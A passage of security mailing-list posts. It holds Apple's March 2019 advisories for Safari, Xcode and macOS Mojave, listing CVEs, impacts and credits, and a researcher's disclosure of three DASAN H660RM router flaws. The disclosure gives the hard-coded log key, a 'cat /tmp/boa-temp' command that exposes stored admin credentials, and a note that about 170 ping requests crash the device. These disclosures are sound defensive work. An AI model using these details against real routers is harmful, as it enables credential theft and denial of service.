existed with the fetch API. This was addressed with improved input validation. CVE-2019-8515: James Lee (@Windowsrcer) WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8536: Apple CVE-2019-8544: an anonymous researcher WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-7285: dwfault working at ADLab of Venustech CVE-2019-8556: Apple WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: A malicious website may be able to execute scripts in the context of another website Description: A logic issue was addressed with improved validation. CVE-2019-8503: Linus Särud of Detectify WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: A validation issue was addressed with improved logic. CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A memory corruption issue was addressed with improved validation. CVE-2019-8562: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved validation. CVE-2019-8551: Ryan Pickren (ryanpickren.com) Additional recognition Safari We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs (payatu.com) for their assistance. WebKit We would like to acknowledge Andrey Kovalev of Yandex Security Team for their assistance. Installation note: Safari 12.1 may be obtained from the Mac App Store. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZM7kpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3F9mw// eDj85xvN64fiki5XR1Toh6Ef4mNoVtRjiwD9f7SAKK7j384eP2BXSkScKv6Y1U7M Vd07rBluq9Lw/CEq9Vwu/a2yOa22ilTy4q2O36rXoJ5LC0O4xjmoXN2M72mbPFqn 7vDmQTZ8/AxZQF3D57d+cMrdxKZbQ1wNJRQhRUrnNe8VSwwZ2GtHTJ+PnIeq93yb i6uewLWhkfObOrPH4uyx/v3N1ZxfC5S9mSNBLio1C7iQpObBfYt7JlioZZMqiD2d zqV+DBJEmycaANFngC/VDAR1PH/C/h1kEYJotRKUCVucnceptE/3HT0CtE+wFQCU
APPLE-SA-2019-3-25-7 Xcode 10.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-7 Xcode 10.2 Xcode 10.2 is now available and addresses the following: Kernel Available for: macOS 10.13.6 or later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4461: Ian Beer of Google Project Zero Installation note: Xcode 10.2 may be obtained from: https://developer.apple.com/xcode/downloads/ To check that the Xcode has been updated: * Select Xcode in the menu bar * Select About Xcode * The version after applying this update will be "10.2". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZPJspHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HjrQ// ZlUuus0hA3LOUM5PTmYkrOshF3VHp4ROG3lir2gvcQbz0xeRkWD/wJJZhfjBymYd aQYDbouFVJb9WSTXMPb52hz86haeP7UQ5qEIDv+cTNSZtA2vTM4Jx+5134L5C1Sz pPVTqu5uel1+F0c9wPH9TV0u4VaRxnE5z9hIPzoQiXHqs9jhYsgtk9OyiUTnMijd Uqx7yg758Rorpy1IH5C1uuxTA2qvP7lLL4MmuElXJcsCcQvxvYwiSL3c3pwPQYG9 OEm1fiQ/gX08kLH+kKUe5B7OP+OMcpiNcZwvD9IJkQLdWbvU6vyoqTkAAvKX6Y+q ncnsfZDryP4fwuPTm2q4zt7T9WfPBr3nBdc1VTDHkyX9cXwyJ8oPH5Oo6X6jeUlQ gpBGUK2RhlmL/jQp/Q7QQ/qWzcR+Hq3WjMkVLbPCrCl8/Vx+ZwNqvoQvSW+Hxd4d JAJ8tlgRZupyJnfdJxKo8hz7iZKZS2eR1YjwW7GxHeIiLX3TA5rgY/yTYKM/Kxu/ nMwjeymFrtj/CzPQBHRxE/sSx+ly6btFGjEUVrmEBEPpWsOPDEAi4Nd4V9lsFyay Jp4oFL/OjL+upjOWaE0rFED9NmVgqDSjmoInQpzqg749tYrkQfTzOt4X/+dGCC27 tFwu8BbajKF8aSzguKv3D9oAUwYoH/L1bdZVX2vSWyE= =gqgW -END PGP SIGNATURE-
APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra are now available and addresses the following: AppleGraphicsControl Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3 Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A buffer overflow was addressed with improved size validation. CVE-2019-8555: Zhiyi Zhang of 360 ESG Codesafe Team, Zhuo Liang and shrek_wzw of Qihoo 360 Nirvan Team Bom Available for: macOS Mojave 10.14.3 Impact: A malicious application may bypass Gatekeeper checks Description: This issue was addressed with improved handling of file metadata. CVE-2019-6239: Ian Moorhouse and Michael Trimm CFString Available for: macOS Mojave 10.14.3 Impact: Processing a maliciously crafted string may lead to a denial of service Description: A validation issue was addressed with improved logic. CVE-2019-8516: SWIPS Team of Frifee Inc. configd Available for: macOS Mojave 10.14.3 Impact: A malicious application may be able to elevate privileges Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8552: Mohamed Ghannam (@_simo36) Contacts Available for: macOS Mojave 10.14.3 Impact: A malicious application may be able to elevate privileges Description: A buffer overflow issue was addressed with improved memory handling. CVE-2019-8511: an anonymous researcher CoreCrypto Available for: macOS Mojave 10.14.3 Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher DiskArbitration Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3 Impact: An encrypted volume may be unmounted and remounted by a different user without prompting for the password Description: A logic issue was addressed with improved state management. CVE-2019-8522: Colin Meginnis (@falc420) FaceTime Available for: macOS Mojave 10.14.3 Impact: A user's video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing Description: An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic. CVE-2019-8550: Lauren Guzniczak of Keystone Academy Feedback Assistant Available for: macOS Mojave 10.14.3 Impact: A malicious application may be able to gain root privileges Description: A race condition was addressed with additional validation. CVE-2019-8565: CodeColorist of Ant-Financial LightYear Labs Feedback Assistant Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.3 Impact: A malicious application may be able to overwrite arbitrary files Description: This issue was addressed with improved checks. CVE-2019-8521: CodeColorist of Ant-Financial LightYear Labs file Available for: macOS Mojave 10.14.3 Impact: Processing a maliciously crafted file might disclose user information Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-6237: an anonymous researcher Graphics Drivers Available for: macOS Mojave 10.14.3 Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-8519: Aleksandr Tarasikov (@astarasikov), Juwei Lin (@panicaII) and Junzhi Lu of Trend Micro Research working with Trend Micro's Zero Day Initiative iAP Available for: macOS Mojave 10.14.3 Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher IOGraphics Available for: macOS Mojave 10.14.3 Impact: A Mac may not lock when disconnecting from an external monitor Description: A lock handling issue was addressed with improved lock handling. CVE-2019-8533: an anonymous researcher, James Eagan of Télécom ParisTech, R. Scott Kemp of MIT, Romke van Dijk of Z-CERT IOHIDFamily Available for: macOS Mojave 10.14.3 Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: A memory corruption issue was addressed with improved state management. CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team IOKit Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3 Impact: A local user may be able to read kernel memory Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8504: an anonymous researcher IOKit SCSI Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-8529: Juwei
Multiple vulnerabilities in DASAN H660RM GPON router firmware
Hi! CVE-2019-9974: diag_tool.cgi on DASAN H660RM devices with firmware 1.03-0022 allows spawning ping processes without any authorization leading to information disclosure and DoS attacks Remote attacker could enumerate hosts on LAN interface sending requests to /cgi-bin/diag_tool.cgi with ip parameter set to target IP address. Lack of authorization in /cgi-bin/diag_get_result.cgi allow retrieval of results. Each call to diag_get_result.cgi retrieves one line of ping (or traceroute) output. Same CGI script has another weakness, CWE-400: Uncontrolled Resource Consumption, which allows memory memory exhaustion Denial of Service (DoS) attack against device. Around 170 spawned ping processes is enough to cause crash and reboot of router. PoC exploit available. More: https://blog.burghardt.pl/2019/03/diag_tool-cgi-on-dasan-h660rm-devices-with-firmware-1-03-0022-allows-spawning-ping-processes-without-any-authorization-leading-to-information-disclosure-and-dos-attacks/ CVE-2019-9975: syslog_tool.cgi on DASAN H660RM devices with firmware 1.03-0022 uses a hard-coded key for logs encryption DASAN uses a hard-coded key “dasanektks123” for logs encryption. Data stored using this key can be decrypted by anyone able to access this key. More: https://blog.burghardt.pl/2019/03/syslog_tool-cgi-on-dasan-h660rm-devices-with-firmware-1-03-0022-uses-a-hard-coded-key-for-logs-encryption/ CVE-2019-9976: Boa Webserver on DASAN H660RM devices with firmware 1.03-0022 saves post data, including credentials, to /tmp/boa-temp Exploitation is possible for users logged in over telnet of SSH. If user logged though Web UI and until he make any other POST request, his credentials can be retrieved with: $ cat /tmp/boa-temp StatusActionFlag=-1=admin=vertex25 More: https://blog.burghardt.pl/2019/03/boa-webserver-on-dasan-h660rm-devices-with-firmware-1-03-0022-saves-post-data-including-credentials-to-tmp-boa-temp/ BR, -- Krzysztof Burghardt http://www.burghardt.pl/
